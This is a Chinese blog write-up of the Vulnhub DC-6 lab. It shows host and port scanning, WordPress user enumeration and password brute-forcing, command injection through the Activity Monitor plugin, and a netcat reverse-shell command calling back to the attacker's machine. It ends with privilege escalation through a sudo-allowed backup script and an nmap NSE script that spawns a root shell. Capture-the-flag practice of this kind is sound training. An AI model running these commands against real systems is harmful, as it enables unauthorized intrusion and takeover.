首页 > 其他分享 >DC-6-WordPress-nmap提权

DC-6-WordPress-nmap提权

时间:2024-05-04 22:12:30浏览次数:14  
标签:shell nmap jens 用户 dc 提权 WordPress txt

Vulnhub简介

Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。

靶场部署

这个挑战的最终目标是获得root权限并阅读唯一的flag
vulnhub官网https://www.vulnhub.com
下载地址https://www.vulnhub.com/entry/dc-6,315/
1、直接从官网下载做好的虚拟机镜像文件(推荐下载Mirror版本);
2、解压会得到一个.ova的文件,然后在VMware中打开即可;

信息收集

靶机官网给出的两个线索
需要去配置一下hosts文件
image.png
Kali里面的密码本
image.png

1.扫描局域网主机

arp-scan -l

image.png

2.端口探测

nmap -sV -p- 192.168.75.158

image.png
可以看到开放了22和80端口
直接访问80端口是不能够解析出来的,我们需要去配置一下hosts文件

Windows系统下在 C:\windows\system32\drivers\etc\hosts
打开后在末尾添加:192.168.75.158 wordy
Linux系统下在/etc/hosts
vim /etc/hosts
#添加
192.168.75.158 wordy

现在访问即可
image.png
是一个WordPress网站,Kali有专门的扫描工具wpscan

3.目录扫描

apt-get install dirsearch
dirsearch -u http://192.168.75.158

image.png

4.wpscan扫描用户

wpscan --url http://wordy/  -e u

找到五个用户
image.png

爆破

1、找到五个用户名:admin、graham、mark、sarah、jens,将用户名放到一个文件里作为用户名,然后再将rockyou.txt里面的带有k01的导出作为密码,进行爆破
(作者在vulnhub上给了个提示,为了减少暴力破解的时间,需要将包含“k01”的字符串从字典里筛选出来作为新字典用)

vim dc-username.txt #将用户名放到其中
gunzip rockyou.txt.gz rockyou.txt #去rockyou.txt.gz所在的目录解压密码本
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc-passwd.txt #将带有k01的密码导到dc-paswd.txt中

2、使用wpscan来爆破

wpscan --url http://wordy/ -U dc-username.txt -P dc-passwd.txt

找到mark的密码为:helpdesk01
image.png
登陆后台
http://wordy/wp-login.php
image.png

后台插件getshell

1、利用Activity monitor插件的rce漏洞来getshell
2、点击Activity monitor -> Tools
image.png
3、执行命令的同时使用burp抓包,发送到repeater模块
前端限制了只能填写15个字符,可以F12修改长度
image.png
image.png
image.png

反弹shell

Kali终端上:nc -lvvp 4444
burp抓包修改为:nc 192.168.75.150 4444 -e /bin/bash

image.png
获取一个稳定一点的shell终端

python -c 'import pty;pty.spawn("/bin/bash")'

image.png

切换用户

在/home/mark/stuff下发现一个文件,记录了用户graham的密码GSo7isUM1D4
image.png
成功切换到graham用户下
image.png

提权

先查看一下有没有suid提权,没有再使用sudo -l看一下可执行的命令
可以看到允许graham用户在不深入jens用户密码的情况下,使用jens身份执行/home/jens/backups.sh这个脚本文件
image.png
查看一下脚本内容

cat /home/jens/backups.sh

我们现在可以执行这个脚本,而且该脚本也在jens的目录下,那可以将/bin/bash写到这个脚本中,再以jens用户来执行这个脚本,那我们就可以获得jens的shell了

echo "/bin/bash" >> backups.sh

image.png
然后以jens用户执行

sudo -u jens ./backups.sh

image.png
已经切换到jens用户
再使用sudo -l查看一下可以执行的操作
image.png
发现是可以使用nmap的root权限,将反弹shell的命令写入到脚本中,然后使用nmap来执行脚本就可以获得root用户的shell了

echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell

image.png

知识点总结

  1. 信息收集
  2. wpscan工具的使用,枚举用户名,爆破登录
  3. WordPress插件activity monitor远程代码执行漏洞
  4. nmap提权

标签:shell,nmap,jens,用户,dc,提权,WordPress,txt
From: https://www.cnblogs.com/NoCirc1e/p/18172795

相关文章

  • DC-9-sudo提权
    标签:SQL注入、本地文件包含LFI、端口敲门、hydra爆破、linux提权0x00环境准备下载地址:https://www.vulnhub.com/entry/dc-9,412/靶机描述:DC-9isanotherpurposelybuiltvulnerablelabwiththeintentofgainingexperienceintheworldofpenetrationtesting.The......
  • DC-8-Drupal-exim4提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com......
  • WordPress操作文章类常用的动作钩子
    publish_post:参数一个($post_ID),点击发布文章时就会被触发;save_post:参数一个($post_ID),发布或更新文章时就会被触发;edit_post:参数两个($post_ID,$post),只要编辑已经存在的文章就会被触发;publish_future_post:参数一个($post_ID),到定时发布文章设定的时间点就会被触发,如果设定的时间早于......
  • 使用 WordPress搭建一个个人博客
    安装LNMP首先需要下载LNMP:wgethttp://soft.vpser.net/lnmp/lnmp2.0.tar.gz-cOlnmp2.0.tar.gz下载完成后解压并执行:tarzxflnmp2.0.tar.gz&&cdlnmp1.5&&./install.shlnmp选择想要安装的版本然后回车开始安装,这里时间比较长,耐心等待一下,看到以下显示表示安装成功配......
  • Nmap
    1.查看主机是否在线2.扫描主机开放的端口3.识别目标主机的操作XT4.检查自标主机开启服务的版本信息5.检测漏洞Windows图形化操作:https://www.bilibili.com/video/BV1k34y1N7hu?t=200.0https://www.bilibili.com/video/BV1k34y1N7hu?t=200.0第一种:Intensescan(nmap-T4-A......
  • Shell 脚本:创建用户、创建同名用户组、配置密码、免密提权
    #!/usr/bin/envbashset-xeuopipefail#需要以root运行,或者sudoif[`id-u`-ne0]thenechoPleaserunthisscriptasrootorusingsudo!exitfiUserID=3001#TODO自行修改UserName=hello#TODO自行修改UserPwd=world#TODO自行......
  • Netfilter漏洞提权利用(CVE-2023-35001)
    前言Netfilter是一个用于Linux操作系统的网络数据包过滤框架,它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式,以实现网络安全、网络地址转换(NetworkAddressTranslation,NAT)、数据包过滤等功能。漏洞成因在......
  • 基于python语言命令行模式的nmap扫描- python-nmap
    使用python命令行模式进行nmap扫描,简化流程首先安装python环境https://www.python.org/downloads/安装nmap,python-nmap需要借助nmap运行https://nmap.org/download写python-nmap脚本https://github.com/home-assistant-libs/python-nmap代码:点击查看代码......
  • nmap的简单使用
    Nmap是一款开源免费的网络发现(NetworkDiscovery)和安全审计(SecurityAuditing)工具。软件名字Nmap是NetworkMapper的简称Nmap下载地址:http://nmap.org/download.html nmap包含四项基本功能:1.主机发现(hostDiscovery)2.端口扫描(PortScanning)3.版本侦测(VersionDetec......
  • 在Linux中,如何使用Nmap进行网络发现和安全扫描?
    Nmap(NetworkMapper)是一个强大的网络扫描和安全审计工具,它可以用于网络发现、安全扫描、端口扫描、服务和版本检测等多种用途。以下是使用Nmap进行网络发现和安全扫描的基本步骤和选项:1.网络发现基本的Ping扫描:使用Nmap发送Ping请求来发现网络上的活动主机。nmap-sn192.1......